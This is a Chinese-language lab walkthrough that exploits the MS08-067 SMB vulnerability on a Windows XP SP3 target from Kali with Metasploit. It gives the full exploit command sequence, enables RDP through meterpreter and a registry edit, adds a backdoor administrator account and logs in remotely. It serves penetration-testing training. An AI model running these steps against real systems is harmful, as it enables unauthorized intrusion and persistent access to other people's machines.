实验环境
Windows XP SP3
IP:172.16.211.129
百度网盘:https://pan.baidu.com/s/1dbBGdkM6aDzXcKajV47zBw 靶机环境
Kali Linux 2.0
IP:172.16.211.128
实验原理
漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。
在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。
Kali 启动metasploit服务
kali linux 2.0 本身已内置metasploit,kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用。
kali 2.0中启动带数据库支持的msf方式
#首先启动postgresql数据库 /etc/init.d/postgresql start; 或者 service postgresql start; #初始化MSF数据库(关键步骤!) msfdb init; #运行msfconsole msfconsole; #在msf中查看数据库连接状态 db_status #将postgresql数据库设置开机自启 update-rc.d postgresql enable
漏洞利用过程
在msfconsole使用 search 命令搜索MS08067漏洞攻击程序
从结果中得到 exploit/windows/smb/ms08_067_netapi
表示当前msf框架中包含MS08067漏洞的攻击插件。
使用use命令调用MS08067漏洞攻击程序
#进入msf的交互式命令窗口
use exploit/windows/smb/ms08_067_netapi
查看需要设置的选项
#查看设置选项
show options
从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)
使用 set 命令设置 Module Options
#设置目标IP即 set rhost 172.16.211.129
使用show options 命令查看设置情况
从中可以看出目标IP已经设置好了,接着设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞。
因为实例演示的XP系统为WinXP SP3 简体中文版对应的编号为34
使用set target 命令设置目标
#设置目标 set target 34
使用exploit 或者 run 命令进行攻击
#进行攻击
exploit
或者
run
执行命令后得到一个meterpreter命令行交互窗口
打开RDP(远程桌面)服务
#打开远程服务 端口3389(meterpreter命令行交互窗口执行命令)
run getgui -e
进入CMD窗口
#进入cmd窗口
shell
在cmd命令下也可以通过添加注册表项的方式开启对方远程桌面服务(如果上面已经开启了,这步可以省略)。
#开启远程服务 REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections" /t REG_DWORD /d 00000000 /f
查看端口是否开放
#查看端口状态
netstat -ano
查看XP系统中的用户
#查看系统中用户
net user
添加账户和管理员权限
#添加用户 格式一 net user user pass /add 例如:net user gao 123 /add 格式二 net localgroup administrators /add 例如:net localgroup administrators gao /add
用本机Ka li 远程访问目标主机(利用新建的用户)
rdesktop -a 32 -u gao -p 123 172.16.211.129:3389
完成Windows XP SP3系统侵入!!